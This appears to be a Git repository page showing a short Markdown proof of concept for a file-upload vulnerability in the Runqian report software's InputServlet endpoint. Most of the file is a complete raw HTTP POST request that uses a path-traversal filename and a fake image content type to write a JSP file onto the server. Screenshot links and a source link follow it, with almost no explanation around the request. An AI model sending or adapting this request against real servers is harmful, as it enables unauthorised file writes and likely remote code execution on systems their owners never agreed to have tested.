admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/润乾报表InputServlet接口存在文件上传漏洞.md

33 lines
907 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 润乾报表InputServlet接口存在文件上传漏洞
环境https://github.com/charlesvhe/raqsoft
## poc
```
POST /InputServlet?action=12 HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: multipart/form-data; boundary=--------------------------170005680039721412137562
Accept-Encoding: gzip, deflate, br
Content-Length: 2401
----------------------------170005680039721412137562
Content-Disposition: form-data; name="upsize"
1024
----------------------------170005680039721412137562
Content-Disposition: form-data; name="file"; filename="/\..\\..\2.jsp"
Content-Type: image/png
11111
----------------------------170005680039721412137562--
```
![image](https://github.com/wy876/POC/assets/139549762/040e8f76-a72c-47db-a161-d14cab5db001)
![image](https://github.com/wy876/POC/assets/139549762/bea567d7-6648-4cbe-990a-8fbb876d7660)
## 漏洞来源
- https://mp.weixin.qq.com/s/-u1fn_q4e-YhJUEqwNG1Zg
Reference in New Issue View Git Blame Copy Permalink